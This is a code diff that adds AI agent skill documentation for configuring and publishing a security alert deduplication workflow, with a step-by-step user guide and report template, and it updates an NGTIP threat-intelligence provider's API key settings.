+Good pattern after showing a diff:
+
+```json
+{
+  "questions": [
+    {
+      "header": "确认应用",
+      "question": "是否应用上面的发布配置 diff?",
+      "type": "choice",
+      "options": [
+        {"label": "应用 diff", "description": "通过后端配置接口写入 Storage/SQL。"},
+        {"label": "只保存草稿", "description": "不改运行配置，只写到输出目录。"},
+        {"label": "暂不修改", "description": "停止本次配置变更。"}
+      ]
+    },
+    {
+      "header": "补充说明",
+      "question": "如需限制范围或补充要求，请输入；没有则填 none。",
+      "type": "text",
+      "placeholder": "none"
+    }
+  ]
+}
+```
+
+## Applying Publish Configuration
+
+When the user approves an apply:
+
+1. Read and preserve the previous canonical template from `GET /api/workflow/<workflow_id>/config`.
+2. If the response says no stored template exists, call `POST /api/workflow/<workflow_id>/config/sync` so the backend migrates the fallback file or creates a generated template.
+3. Deep-merge the selected values into the existing config shape where possible.
+4. Prefer the backend template endpoint: `PUT /api/workflow/<workflow_id>/config` with the full proposed config object as the JSON body.
+5. Use the response's `config` as the saved template and `runtime` as the current effective state; do not infer runtime state from template `enabled` fields.
+6. If the endpoint is unavailable, save a draft under `~/.flocks/workspace/outputs/<today>/` instead of changing `config.json`, and clearly state that the change was not applied, not published, and not started.
+7. Validate the saved template with a JSON parser.
+8. Verify the publish page or config endpoint returns the saved template from Storage/SQL.
+9. Run a smoke test with `metadata.sampleInputs`, `workflow.json` sample inputs, or the user's pasted sample when a safe local test is available.
+10. If validation fails, restore the previous template through `PUT /api/workflow/<workflow_id>/config` and report the exact failure.
+
+If the user says "publish as API", "Syslog input", "Kafka input", "Webhook input", or "Schedule" from the Publish page, treat it as a guided configuration intent:
+
+- First identify whether the user wants to declare/change the template, start/stop runtime state, or both.
+- For template changes, use `GET /config` -> diff -> question confirmation -> `PUT /config`.
+- For runtime actions, use the runtime endpoint after template confirmation, such as `/publish`, `/unpublish`, `/syslog-config`, `/kafka-config`, `/poller-config`, or `/triggers`.
+- If the backend is unreachable, do not say "the user should publish later in the WebUI" as if the requested action succeeded. Save a draft and report the exact blocker.
+
+When the user wants to start, stop, enable, disable, publish, or unpublish a capability, do not edit the template. Use the runtime endpoint for that capability, such as `/publish`, `/unpublish`, `/syslog-config`, `/kafka-config`, `/poller-config`, or `/triggers`.
+
+If the user chooses draft mode, save the proposed config under `~/.flocks/workspace/outputs/<today>/` and list the path in the final report.
+
+## Report Requirements
+
+The final report must include:
+
+- Workflow id, workflow directory, Storage/SQL config source, and optional fallback `config.json` path.
+- What was configured by the guide.
+- What remains for the user to do, including upstream forwarding, API key/secret setup, broker/channel details, firewall/port needs, and production validation.
+- Sample validation result if a sample was provided.
+- Full final config or draft path.
+- Smoke test results or a clear reason the smoke test was skipped.
+
+Do not look for skill-relative `references/` files during workflow configuration. Workflow-specific details must come from the current workflow's own `guide.md`; this prevents loading stale generic instructions or resolving a project-level skill path as a user-level path.
+
+## Safety Rules
+
+- Never ask the user to paste credentials in chat.
+- Never enable broad/audit outputs without explicit user opt-in.
+- Never clear persistent dedup/state files without explaining the consequence and getting confirmation.
+- Never claim production readiness until a sample or smoke test has passed, or explicitly mark the setup as unvalidated.
+- Be explicit when field mappings are inferred rather than confirmed.
diff --git a/.flocks/plugins/skills/workflow-config-guide/references/stream-alert-dedup-integration-guide.md b/.flocks/plugins/skills/workflow-config-guide/references/stream-alert-dedup-integration-guide.md
new file mode 100644
index 000000000..66434f327
--- /dev/null
+++ b/.flocks/plugins/skills/workflow-config-guide/references/stream-alert-dedup-integration-guide.md
@@ -0,0 +1,471 @@
+# Rex Integration Guide: stream_alert_dedup
+
+> Purpose: This document is injected into Rex when the user opens the workflow Integration tab and starts the intelligent configuration guide. Rex should use it as product/context knowledge, then guide the user step by step with conversational questions and the Question tool.
+
+## 1. Guide Goal
+
+Help a user deploy `stream_alert_dedup` in a new environment with new alert data.
+
+The guide leads the user from "I have a workflow" to "I know exactly what to do next":
+
+- I picked how alerts enter the workflow.
+- I picked the alert source product so fields are auto-mapped.
+- I picked where filtered alerts should go (local files, Kafka, IM push, or a mix).
+- I confirmed or tweaked the denoise and dedup defaults.
+- I pasted one sample and confirmed it normalizes correctly.
+- The workflow's `config.json` was updated to reflect my choices (workflow reads it at runtime via the shared `config_loader.py` helper), or a draft was saved if I wanted to apply later.
+- I got a final report that lists every configuration, every workflow file change, and every remaining step I need to take on my side (device forwarding, ports, downstream bridges, credentials, etc.).
+
+The guide is not a static document. It drives an interactive setup conversation in the Integration tab.
+
+Core principle: **default-everything**. The user is not a security engineer. Rex always proposes a default and only asks the user to confirm or tweak. Technical knobs (syslog protocol, LSH fields, Jaccard threshold, source_log_type plumbing, Kafka brokers, IM session ids) are hidden behind a single "use default / show me details" choice. The user only ever answers questions at the level of "do you want the default?" or "which product are you using?" or "where do you want alerts to go?".
+
+## 2. Workflow Background
+
+`stream_alert_dedup` is a streaming alert deduplication workflow.
+
+Pipeline: `receive_alert -> normalize -> filter_logs -> dedup_and_write`.
+
+- Receives alerts from syslog single-message mode, API batch mode, or file mode. Kafka input is supported through a consumer bridge that calls the workflow API (see Step 1).
+- Normalizes TDP and Skyeye-like alerts into a unified schema. Custom products fall back to a generic mapping.
+- Filters out scanner and non-HTTP noise by default, keeps inbound/outbound/lateral HTTP alerts.
+- Deduplicates with strict fields plus MinHash LSH fuzzy fields, persisted across batches.
+- Writes enriched alert JSONL files under the workflow workspace directory.
+- Adds `dedup_key`, `is_duplicate`, `_lsh_cluster_id`, `_source_type`, `_process_type`, `_threat_type`.
+- Output destinations are external: the workflow always writes JSONL locally; Kafka republish and IM push are achieved via downstream bridges that read the JSONL.
+
+Note: the installed directory may be named `stream_alert_denoise` (as in the `config.json` path used in Step 7), but the workflow identity is `stream_alert_dedup`.
+
+## 3. Recommended Conversation Flow
+
+Rex must not ask all questions at once. Use the steps below, one decision at a time. **Each step ends with a Question tool call.** Each default is auto-applied if the user says "use default".
+
+### Step 1: Pick input mode
+
+How alerts enter the workflow. One question, four options.
+
+- **Syslog (real-time stream)** — security device forwards one alert per Syslog message. Most common. Requires the workflow to enable its built-in syslog receiver.
+- **API batch** — upstream calls the workflow HTTP API with a list of alerts. Good for batch import or testing.
+- **Kafka (real-time stream)** — upstream publishes alerts to a Kafka topic. Requires a small consumer/bridge that pulls each message and invokes the workflow API. Rex can draft the bridge script on request.
+- **File** — a JSON file of alerts is dropped in. Good for one-shot replay or offline analysis.
+
+After the user picks, Rex says one sentence on what changes (e.g. "OK, we'll set up a syslog receiver on UDP 5140" or "OK, you'll need a Kafka consumer that calls the workflow API — I'll list the parameters you need in the report at the end") and moves on.
+
+For Kafka mode, Rex follows up in plain chat (not via Question tool) to collect: brokers, topic, consumer group, auth mode, message format (raw JSON / envelope / Avro / Protobuf / text), and whether the user wants Rex to generate the consumer bridge.
+
+### Step 2: Pick alert source product
+
+Which product is generating the alerts. This drives the field mapping in the `normalize` node.
+
+- **TDP / 威胁检测平台** — ThreatBook (微步在线) TDP or a compatible NDR. The default mapping already covers `net_http_url`, `threat_name`, etc.
+- **天眼 / SkyEye** — QiAnXin (奇安信) SkyEye-style fields such as `uri`, `vuln_name`, `attack_result`.
+- **Other / Custom** — none of the above; will use a generic best-effort mapping and ask the user to confirm one sample.
+
+Rex then notes: "If your product isn't listed, pick Other — we'll match as much as we can and you'll see the gaps in the final report."
+
+### Step 3: Pick output destinations
+
+Where filtered alerts go after dedup. **Local storage is always on** (the workflow always writes JSONL files). The question is what additional destinations to set up.
+
+Default: **local storage only**. The workflow drops enriched alerts into `~/.flocks/workspace/workflows/stream_alert_dedup/<today>/dedup_result_*.jsonl`. Nothing more to set up.
+
+Options (Rex reads them as multi-select when possible):
+
+- **Local storage only (default)** — JSONL files only. Good for offline analysis or downstream pipelines that read files.
+- **Local storage + Kafka** — alerts also get republished to a Kafka topic. You provide brokers, topic, optional key field.
+- **Local storage + IM push** — alerts get pushed to WeCom / Feishu / DingTalk. You provide channel type and session.
+- **Local storage + Kafka + IM push** — all of the above.
+- **Custom downstream** — alerts feed into another workflow I already have.
+
+Rex then asks one follow-up about **what to send** (default: only filtered-in alerts, not dropped or duplicates):
+
+- **Filtered-in alerts only (default)** — everything that passed denoise and dedup, written to JSONL and forwarded.
+- **Filtered-in unique only** — skip duplicates, only first occurrences. Good for SOC ticket creation.
+- **Audit mode** — also write the dropped and merged alerts to a separate JSONL, for forensics. Use only when investigating; the writer emits `_audit_reason: filtered_out | dedup_merged`.
+
+Rex then says: "By default the workflow only emits alerts that survived filtering. If you choose audit mode, dropped and duplicate alerts are written to a sibling file for forensics."
+
+### Step 4: Confirm denoise strategy
+
+Show the user the default in plain language, ask whether to keep it. The user does not see `filter_enabled`, `process_type`, or HTTP protocol detection — they only see behavior.
+
+Default behavior:
+
+> Keep alerts that look like real web attacks: HTTP traffic, with a clear direction (inbound, outbound, or lateral). Drop scanner traffic and non-HTTP noise.
+
+Options:
+
+- **Use default** — recommended for almost everyone.
+- **Tighten** — keep only inbound HTTP (drop outbound and lateral). Use for internet-facing SOC.
+- **Loosen** — keep everything, no filtering. Use during initial validation only.
+- **Show me the details** — Rex explains the 9 process_type categories in plain language and lets the user pick.
+
+### Step 5: Confirm dedup strategy
+
+Show the default in plain language. The user does not see `strict_fields`, `lsh_fields`, `threshold`, or `max_dedup_keys`.
+
+Default behavior:
+
+> Two alerts are duplicates when they come from the same attacker to the same target, with similar HTTP URL and body. The system learns over time and remembers across batches.
+
+Options:
+
+- **Use default** — recommended for web attack alerting.
+- **Tighter** — only merge when the URL and request body are nearly identical. Use when unrelated alerts are being merged.
+- **Looser** — merge more aggressively on weaker evidence. Use when obvious duplicates are slipping through.
+- **Target-centric** — group by target + rule, ignore attacker. Use for SOC playbooks that care about "what's hitting this asset".
+- **Show me the details** — Rex explains strict vs fuzzy fields and Jaccard threshold in plain language.
+
+### Step 6: Validate with one real sample
+
+Rex asks the user to paste one representative raw alert. The user can choose:
+
+- **I'll paste a real alert** — Rex parses it, reports:
+  - Which fields were auto-mapped to the standard schema.
+  - Which fields were unknown and ignored.
+  - What the normalized alert looks like.
+  - What the dedup_key would be.
+- **I don't have a sample yet** — Rex marks the integration as "configured but unvalidated" and lists this in the final report as a follow-up. No failure.
+
+If the user pastes a sample, Rex must verify:
+
+1. `raw_count` is at least 1.
+2. Required fields (`sip`, `dip`, `req_http_url`, `threat_name`) are present after normalization. If not, Rex calls them out in the report and suggests what to do (most often: pick "Other" in Step 2 and provide a custom mapping, or fix the upstream source).
+3. The dedup_key looks reasonable (non-empty string).
+4. The same alert pasted a second time would get `is_duplicate=true` (Rex can simulate this in plain language).
+
+### Step 7: Apply configuration to config.json
+
+After all decisions are collected and the sample is validated, Rex applies the configuration to **`~/.flocks/plugins/workflows/stream_alert_denoise/config.json`** — the persistent config file the workflow reads at runtime via the shared `config_loader.py` helper. The workflow code itself is NOT modified in this step (it already knows how to read config); only `config.json` is updated.
+
+**7.1 Compute the new config**
+
+Rex reads the current `config.json` (if any), deep-merges the chosen values, and produces the target config dict. Fields Rex writes based on prior steps:
+
+| Field | Source | Notes |
+|---|---|---|
+| `input_mode` | Step 1 | `syslog` / `api` / `kafka` / `file` |
+| `source_product` | Step 2 | `tdp` / `skyeye` / `custom` |
+| `denoise.strategy` | Step 4 | `default` / `tighten` / `loosen` / `custom: ...` |
+| `denoise.filter_enabled` | Step 4 | Derived from `denoise.strategy` |
+| `dedup.strategy` | Step 5 | `default` / `tighter` / `looser` / `target_centric` / `custom: ...` |
+| `dedup.dedup_enabled` | Step 5 | Derived from `dedup.strategy` |
+| `dedup.threshold` | Step 5 | Derived from `dedup.strategy` |
+| `dedup.strict_fields` | Step 5 | Derived from `dedup.strategy` |
+| `dedup.lsh_fields` | Step 5 | Derived from `dedup.strategy` |
+| `dedup.max_field_len` | Step 5 | 500 default, only written if user changes it |
+| `dedup.max_dedup_keys` | Step 5 | 100000 default, only written if user changes it |
+| `dedup.emit_only_first_occurrence` | Step 5 | `true` default, only written if user changes it |
+| `output.destinations` | Step 3 | `["local"]` + selected extras |
+| `output.scope` | Step 3 | `filtered_in` / `filtered_in_unique` / `audit` |
+
+Rex also rewrites the `_comment` field to include the strategy summary.
+
+**7.2 Show the diff and get confirmation**
+
+1. Rex shows a unified diff in chat for `config.json` only (the workflow code is not touched). The diff is plain text, not applied to disk yet.
+2. Rex asks (Question tool, 2 options): "Apply these changes to config.json?"
+   - **Apply** — write to disk, run validation, run smoke test, then move to Step 8.
+   - **Save as draft, don't apply** — keep the diff as a pending draft, skip the smoke test, mark in the report as "configuration not yet applied".
+
+**7.3 Apply and verify (only on Apply)**
+
+3. Rex uses `edit`/`write` to update `config.json` in place.
+4. Rex runs `python3 -c "import json; json.load(open(<path>))"` for JSON syntax validation.
+5. Rex calls `config_loader.reload_config()` then `config_loader.get_config()` in a one-off Python invocation to confirm the helper reads the new file correctly.
+6. Rex runs a smoke test via `run_workflow` (or `run_workflow_node` per node if `run_workflow` is too heavy) with `metadata.sampleInputs` from `workflow.json` (the built-in mock sample) OR the user's pasted sample. All four nodes must return `success=true` with non-empty key outputs.
+7. If any check fails, Rex reverts `config.json` to its prior content (recovered from the diff shown in 7.2) and reports the failure in the final report. The user is asked to retry or fall back to draft.
+
+**7.4 Idempotency**
+
+- Re-running the guide with the same answers must produce a no-op or trivial diff (only the `_comment` summary line might change).
+- Re-running the guide with different answers must produce a clean diff that reflects only the new choices; old `strategy: "default"` must not stack on top of new `strategy: "tighten"`.
+- `config_loader` reads config lazily on first call, so re-running the workflow after a config change picks up the new values; no workflow restart is required.
+
+If the user chooses "Save as draft, don't apply" in 7.2, Rex saves the configuration as a pending draft to `~/.flocks/workspace/outputs/<today>/stream_alert_dedup_pending_config.json` and lists it under "Pending draft" in section A of the final report as something the user can apply later.
+
+### Step 8: Final report
+
+Rex writes a single end-of-conversation report (in chat AND to `~/.flocks/workspace/outputs/<today>/stream_alert_dedup_integration_<timestamp>.md`). The report follows the template in Section 5 and has clearly separated sections, the two most important being:
+
+**A. Configurations made by this guide (you don't need to do these)**
+
+- Input mode, source product, denoise strategy, dedup strategy, with the actual values plugged in.
+- Output destinations and scope (which alerts are emitted where).
+- Field mapping draft (raw field → standard field → confidence).
+- Sample validation result (if user provided one).
+- **config.json applied (if Step 7.3 ran)**:
+  - Path: `~/.flocks/plugins/workflows/stream_alert_denoise/config.json`
+  - Full final config (every field, with chosen values).
+  - Smoke test result for all four nodes (`success/fail + duration_ms`).
+- **Pending draft (if Step 7 was skipped)**:
+  - Path to the saved draft JSON.
+  - One-line summary of what would change.
+
+**B. What you still need to do, and what info you need to do it**
+
+For each remaining step, the report gives:
+
+- The exact action.
+- The exact info the user must collect (with copy-pasteable templates).
+- The exact command / config snippet they will run.
+
+Examples of remaining steps that the report must cover (the input-mode subsections and the output-mode subsections are independent and only the ones the user picked appear):
+
+- **Syslog mode (input)**: device forwarding target (host:port), protocol, app_name/hostname expectations, sample message body template.
+- **API mode (input)**: workflow invoke URL, API key location (reference to secret manager, never paste in chat), sample request body.
+- **Kafka mode (input)**: broker addresses, topic, consumer group, auth mode, message format, offset strategy, retry/DLQ guidance, and an optional bridge script for Rex to generate.
+- **IM push mode (output)**: channel type, session id, message format, rate limit guidance, sample message template.
+- **Custom product**: which fields failed to map, and what custom mapping needs to be added to the `normalize` node (Rex drafts the code change but does not apply it without explicit user confirmation).
+- **Validate in production**: a 5-step smoke test checklist (see B.4 in the report template).
+- **State hygiene**: when the LSH state file will be created, how to clear it, when not to clear it in production.
+
+Rex ends with one sentence: "All set on my side. The remaining items are listed in section B. If you skipped applying in Step 7, the draft config is saved at the path in section A. Once you finish B, paste one real alert here and I'll re-validate."
+
+## 4. Question Tool Usage Pattern
+
+Use the Question tool for any decision point with 2-4 clear options. Always include a "use default" option for technical defaults. Never use Question tool for:
+
+- Asking the user to paste JSON (use plain chat).
+- Asking the user to enumerate field names (use plain chat, or break it down).
+- Collecting secrets or credentials (redirect to secret manager).
+
+When the user picks a custom / non-default option, Rex follows up with one plain-language explanation of what changes, then moves to the next step. Never chain two Question calls in one message.
+
+For Step 3 (output destinations), use the multi-select variant when the UI supports it; otherwise list them in one question with the user expected to type the destinations they want.
+
+## 5. Output Report Template
+
+Rex uses this template for the final report. The report is shown in chat and saved to disk.
+
+```markdown
+# stream_alert_dedup 集成报告
+
+生成时间: <ISO timestamp>
+workflow: stream_alert_dedup
+
+## A. 已完成的配置（你无需操作）
+
+- 输入模式: <syslog | api | kafka | file>
+- 告警源产品: <tdp | skyeye | custom>
+- 输出目的地: <local | local+kafka | local+im | local+kafka+im | local+custom>
+- 输出内容范围: <filtered_in | filtered_in_unique | audit>
+- 降噪策略: <default | tighten | loosen | custom: brief description>
+- 去重策略: <default | tighter | looser | target_centric | custom: brief description>
+- 默认字段映射: <raw -> standard, table form>
+- 样例验证: <passed | not provided | failed: reason>
+  - 输入字段数: N
+  - 归一化后字段: sip, dip, req_http_url, ...
+  - 缺失/未知字段: ...
+  - 模拟二次出现 is_duplicate: true/false
+
+## B. 你还需要做什么
+
+### B.1 设备/上游侧配置
+
+<only the relevant subsections appear>
+
+#### Syslog 模式
+- 在 <device> 上配置 syslog 转发:
+  - 目标地址: <flocks-host>:<port>  ← 在工作流发布后由工作流 API 给出
+  - 协议: <udp | tcp | tls>
+  - 一条告警对应一条 Syslog 事件
+  - message 字段必须是完整 JSON 字符串, 不可截断
+- 防火墙: 放通 UDP/TCP 5140 入站
+- 样例 message 模板:
+  ```
+  {"id":"...","net":{"http":{"url":"..."}},"threat":{"name":"..."}}
+  ```
+
+#### API 模式
+- 工作流发布后, 上游调用: POST /api/workflow/<id>/run
+- 请求体: {"inputs": {"alerts": [...], "source_log_type": "tdp"}}
+- API key: 存到 Flocks secret manager, 名称: <suggested name>
+- 样例请求体:
+  ```json
+  { "inputs": { "alerts": [...], "source_log_type": "tdp" } }
+  ```
+
+#### Kafka 模式
+- 你需要: 部署一个轻量消费者/桥, 从 Kafka topic 拉消息, 调工作流 API
+- 消费者输入(部署前要准备好):
+  - brokers: <host1:9092,host2:9092,...>
+  - topic: <如 alerts.raw>
+  - consumer group: <如 stream-alert-dedup-bridge>
+  - 认证: <none | sasl_plain | sasl_ssl, secret 名称>
+  - 消息格式: <raw JSON | envelope | Avro | Protobuf | text>
+  - offset 策略: <latest(新部署) | earliest(回放) | 显式 offset(验证)>
+  - 期望吞吐: <N msg/s> 与 允许重试: <N 次, DLQ 处理>
+- 消费者输出: 解析消息为 JSON 对象, 调工作流 API
+  - 单条: POST /api/workflow/<id>/run body={"inputs":{"alerts":[msg]}}
+  - 批量(可选): 累积 N 条 / T 秒 合并为 alerts 列表
+- 建议: 首次只取 N 条消息做验证, 通过后再放开
+- 是否需要 Rex 生成消费者桥脚本: <是 | 否 | 已生成待你确认>
+- 桥脚本存放位置: ~/.flocks/workspace/outputs/<today>/kafka_bridge_<id>.py
+- 部署方式: <systemd 单元 | docker compose | k8s deployment, 模板见附录>
+
+### B.2 输出目的地配置
+
+<only the relevant subsections appear>
+
+#### 本地存储（默认，始终开启）
+- 落盘目录: ~/.flocks/workspace/workflows/stream_alert_dedup/<today>/
+- 文件名: dedup_result_001.jsonl, 002.jsonl, ...（每文件 10000 条上限）
+- 首行为 file_header, 之后是 enriched_alert 行
+- 审计模式: 另写 dedup_audit_001.jsonl, 含 _audit_reason 字段
+
+#### Kafka 推送（若选了）
+- 模式: 部署一个轻量消费者/桥, 监听本地 JSONL, 转发到 Kafka
+- 你需要提供:
+  - brokers: <host1:9092,host2:9092,...>
+  - topic: <建议名, 如 alerts.dedup>
+  - key 字段: <建议 dedup_key, 保证同一去重簇落同一分区>
+  - 认证: <none | sasl_plain | sasl_ssl, 以及对应的 secret manager 名称>
+- 消息格式: 一条 enriched_alert 一条 Kafka 消息（JSON 序列化）
+- 限流建议: 一次性消费最多 100 行, 避免 OOM
+- 重试与 DLQ: 消费者自己负责, 工作流只保证 JSONL 落盘
+- 是否需要 Rex 生成消费者脚本: <是 | 否 | 已生成待你确认>
+
+#### IM 推送（若选了）
+- 模式: 部署一个 watcher workflow, 监听 JSONL 文件变化, 调用 channel_message
+- 你需要提供:
+  - channel_type: <wecom | feishu | dingtalk>
+  - session_id: <从 IM 客户端获取, 不要在聊天里贴>
+  - 限流: <默认每批 ≤ 5 条, 间隔 30s, 可调>
+- 样例消息模板（按 enriched_alert 字段填充）:
+  ```
+  [stream_alert_dedup] 检测到 1 条告警
+  - 来源: <sip>:<sport> -> <dip>:<dport>
+  - 威胁: <threat_name> / <threat_type>
+  - 方向: <direction> | 协议: <net_type>
+  - 去重键: <dedup_key>
+  - 时间: <time>
+  ```
+- 是否需要 Rex 生成 watcher workflow: <是 | 否 | 已生成待你确认>
+
+#### 自定义下游（若选了）
+- 你的下游系统: <name>
+- 消费方式: <watch JSONL | poll API | 其他>
+- 需要的工作流输出字段: <list>
+- 是否需要 Rex 协助对接: <是 | 否>
+
+### B.3 自定义产品（若选 Other）
+- 失败的字段映射: <list>
+- 需要的修改: 在 normalize 节点新增 <CUSTOM_FIELD_MAP>
+- 是否需要 Rex 协助修改代码: <是 | 否 | 已生成 diff 待你确认>
+
+### B.4 上线前 smoke test
+1. 发送 1 条样例告警, 确认 stats.raw_count=1
+2. 同一条再发一次, 确认 is_duplicate=true
+3. 检查落盘文件: ~/.flocks/workspace/workflows/stream_alert_dedup/<today>/dedup_result_001.jsonl
+4. 首行必须是 file_header, 之后是 enriched_alert 行
+5. 如果开启了 IM/Kafka, 确认收到了对应消息/事件
+
+### B.5 状态卫生
+- LSH 状态文件: ~/.flocks/workspace/workflows/stream_alert_dedup/lsh_state_*.pkl
+- 首次执行自动创建
+- 生产环境切勿在排查时直接删除该文件, 否则会丢失跨批次积累的去重历史
+- 多租户隔离: 为不同租户拷贝独立工作流(状态目录在工作流目录下, 复制即隔离)
+
+## C. 后续验证
+- 拿到第一条真实告警后, 把它粘回给我, 我会重新跑一遍 Step 6 并更新本报告
+- 如果你后续在 B.2 选了 Kafka/IM/自定义, 把对应信息告诉我, 我帮你生成对接脚本
+- 如果 Step 7 没应用, 确认要应用时告诉我, 我会把 pending_config.json 里的内容重新走一遍 7.2-7.3 流程
+
+## D. config.json 变更 (Step 7 详情)
+
+<only appears when Step 7.3 actually wrote to disk>
+
+### D.1 config.json 变更
+- 路径: ~/.flocks/plugins/workflows/stream_alert_denoise/config.json
+- 修改字段 (old -> new):
+  - input_mode: <old> -> <new>
+  - source_product: <old> -> <new>
+  - denoise.strategy: <old> -> <new>
+  - denoise.filter_enabled: <old> -> <new>
+  - dedup.strategy: <old> -> <new>
+  - dedup.dedup_enabled: <old> -> <new>
+  - dedup.threshold: <old> -> <new>
+  - dedup.strict_fields: <old> -> <new>
+  - dedup.lsh_fields: <old> -> <new>
+  - dedup.max_field_len: <old> -> <new>  (仅在用户改默认时)
+  - dedup.max_dedup_keys: <old> -> <new>  (仅在用户改默认时)
+  - dedup.emit_only_first_occurrence: <old> -> <new>  (仅在用户改默认时)
+  - output.destinations: <old> -> <new>
+  - output.scope: <old> -> <new>
+  - _comment: <old> -> <new>  (重写为含策略摘要的版本)
+- 完整 unified diff: 见报告同目录的 config.json.diff
+
+### D.2 配置加载验证
+- JSON 语法校验: <passed | failed: reason>
+- config_loader.reload_config() 读取新文件: <passed | failed: reason>
+- 读取后 cfg 字段比对: <matched | mismatched: 列出差异>
+  - 与本报告 A 节"已完成的配置"中的值一致
+
+### D.3 冒烟测试结果
+- 样本来源: <内置 mock (metadata.sampleInputs) | 用户粘的样本>
+- 节点执行:
+  - receive_alert.run_workflow_node:    success=<bool>, duration_ms=<n>
+  - normalize.run_workflow_node:        success=<bool>, duration_ms=<n>
+  - filter_logs.run_workflow_node:      success=<bool>, duration_ms=<n>
+  - dedup_and_write.run_workflow_node:  success=<bool>, duration_ms=<n>
+  - (或 run_workflow 全链路: success=<bool>, duration_ms=<n>)
+- 关键输出校验:
+  - stats.raw_count: <n>
+  - stats.after_filter_count: <n>
+  - stats.unique_key_count: <n>
+  - enriched_alerts[0].dedup_key 非空: <true | false>
+  - 同条再跑一次 is_duplicate: <true | false>  (若已验证)
+
+### D.4 回滚状态
+- 全部通过: <是 | 否>
+- 失败回滚: <未发生 | 已回滚到 Step 7 之前的内容, 路径: <path>>
+- 报告状态: <config.json 已应用 | config.json 应用失败, 已保存草稿>
+```
+
+## 6. Delivery Requirements for This Guide Feature
+
+UI placement: Add a Rex conversational guide inside the workflow Integration tab. The guide appears near existing integration options such as "Publish as API", "Syslog input", "Kafka config", and downstream output options (Kafka output, IM push). The first message should be proactive and workflow-specific, not a generic chatbot greeting.
+
+Initial context injection: When the user starts the guide, inject this document plus the workflow metadata into Rex. Include workflow ID, workflow name, node list, input schema, output schema, and existing integration status when available. Rex should know whether the workflow is already published as API and whether Syslog/Kafka config exists.
+
+Interaction behavior:
+
+- Rex asks one decision question at a time. Never chain Question calls.
+- Rex always proposes a default; the user only confirms or tweaks.
+- Technical knobs (syslog protocol, LSH fields, threshold, source_log_type, Kafka brokers, IM session ids) are hidden. The user sees "use default" or "show me the details" only.
+- Rex accepts pasted sample alerts and returns a plain-language validation result.
+- Rex can switch modes if the user changes input or output mid-conversation. State is updated in the report.
+- The final report is always written to disk under `~/.flocks/workspace/outputs/<today>/` with a timestamped filename.
+
+Expected final effect: A non-security-engineer can complete first-time deployment without reading workflow JSON. The user knows what the system will do, what they must do, and what info they need to do it.
+
+## 7. Rex Safety and Quality Rules
+
+Rex should:
+
+- Default to safe choices; the user can always override.
+- Be explicit when a field mapping is inferred rather than confirmed.
+- Recommend a small validation run before production traffic.
+- Avoid overwriting production dedup state during tests unless the user confirms.
+- Never ask the user to paste credentials in chat; redirect to the secret manager.
+- Always end with a written report saved to disk, not just chat output.
+- When the user pastes a sample, verify the four Step 6 checks before declaring success.
+- When the user picks "Other / Custom" for product, surface the field gaps in the report instead of silently using a generic mapping.
+- When the user picks an output destination, only emit filtered-in alerts by default; explicitly warn before enabling audit mode.
+- When generating downstream bridges (Kafka consumer, IM watcher), always include rate-limit, retry, and DLQ guidance.
+
+Rex should not:
+
+- Ask technical questions the user can't reasonably answer (protocol, LSH, threshold, source_log_type plumbing, broker addresses, session ids).
+- Assume every source is TDP or Skyeye.
+- Treat Syslog raw text as valid JSON unless the message body is confirmed parseable.
+- Enable production filtering before validating normalized fields.
+- Recommend clearing persistent LSH state without explaining the consequence.
+- Apply code changes (e.g. adding a CUSTOM_FIELD_MAP, generating a watcher workflow) without explicit user confirmation.
+- Promise "it just works" without giving the user a smoke test to run.
+- Emit dropped or duplicate alerts to default destinations without explicit user opt-in to audit mode.
+- Write to `config.json` without first showing the diff and getting explicit "Apply" confirmation in Step 7.2.
+- Modify the workflow code (`workflow.json` node `code` fields) during Step 7 — config.json is the only file Step 7 should touch.
+- Skip the smoke test after applying — `filter_logs` and `dedup_and_write` must be re-run with the new config.
+- Duplicate the "本环境取值" column or stack "## 当前环境配置" sections on a re-run — re-runs must replace, not append.
diff --git a/.flocks/plugins/tools/device/ngtip_v5_1_5/_provider.yaml b/.flocks/plugins/tools/device/ngtip_v5_1_5/_provider.yaml
index f824b4a81..c75b81295 100644
--- a/.flocks/plugins/tools/device/ngtip_v5_1_5/_provider.yaml
+++ b/.flocks/plugins/tools/device/ngtip_v5_1_5/_provider.yaml
@@ -6,22 +6,29 @@ integration_type: device
 description: >
   NGTIP (Next Generation Threat Intelligence Platform) API service.
   Covers two endpoint categories: intelligence query (port 8090) and
-  platform functions (management / write). Configure APIKEY and both
-  Base URLs in the credentials form.
+  platform functions (management / write). Configure separate APIKEYs
+  and both Base URLs in the credentials form.
 description_cn: >
   NGTIP 威胁情报平台 API 服务，覆盖情报查询（端口 8090）和平台功能（管理写入）两类接口。
-  需分别配置 APIKEY、平台功能 Base URL 和情报查询 Base URL。
+  可分别配置情报查询 APIKEY、平台功能 APIKEY、平台功能 Base URL 和情报查询 Base URL。
 auth:
   type: custom
-  secret: ngtip_apikey
+  secret: ngtip_query_apikey
 credential_fields:
-  - key: apikey
-    label: APIKEY
+  - key: query_apikey
+    label: 情报查询 APIKEY
     storage: secret
-    config_key: apiKey
-    secret_id: ngtip_apikey
+    config_key: queryApiKey
+    secret_id: ngtip_query_apikey
     input_type: password
-    required: true
+    required: false
+  - key: platform_apikey
+    label: 平台功能 APIKEY
+    storage: secret
+    config_key: platformApiKey
+    secret_id: ngtip_platform_apikey
+    input_type: password
+    required: false
   - key: base_url
     label: 平台功能 Base URL
     storage: config
@@ -44,4 +51,5 @@ notes: |
   NGTIP API 分为两类，Base URL 不同，务必在配置中均填写：
     - 平台功能接口：base_url（如 http://192.168.1.100）
     - 情报查询接口：query_base_url（如 http://192.168.1.100:8090）
-  认证：所有接口携带 apikey 参数。情报查询接口推荐 GET 传参，平台功能接口使用 POST JSON。
+  认证：所有接口携带 apikey 参数。情报查询接口使用“情报查询 APIKEY”，平台功能接口使用“平台功能 APIKEY”；
+  旧配置中的单个 apiKey 仍会作为兼容回退值使用。
diff --git a/.flocks/plugins/tools/device/ngtip_v5_1_5/_test.yaml b/.flocks/plugins/tools/device/ngtip_v5_1_5/_test.yaml
index 1a044d77d..c47f7a638 100644
--- a/.flocks/plugins/tools/device/ngtip_v5_1_5/_test.yaml
+++ b/.flocks/plugins/tools/device/ngtip_v5_1_5/_test.yaml
@@ -3,8 +3,8 @@ provider: ngtip_api
 
 # Service-level connectivity probe.
 # `query_ip` is chosen because:
-#   - lightweight (GET; only `apikey` + `resource`),
-#   - exercises both `query_base_url` (port 8090) and the apikey,
+#   - lightweight (GET; only query `apikey` + `resource`),
+#   - exercises both `query_base_url` (port 8090) and the query apikey,
 #   - deterministic against 8.8.8.8 (Google DNS).
 connectivity:
   tool: ngtip_query
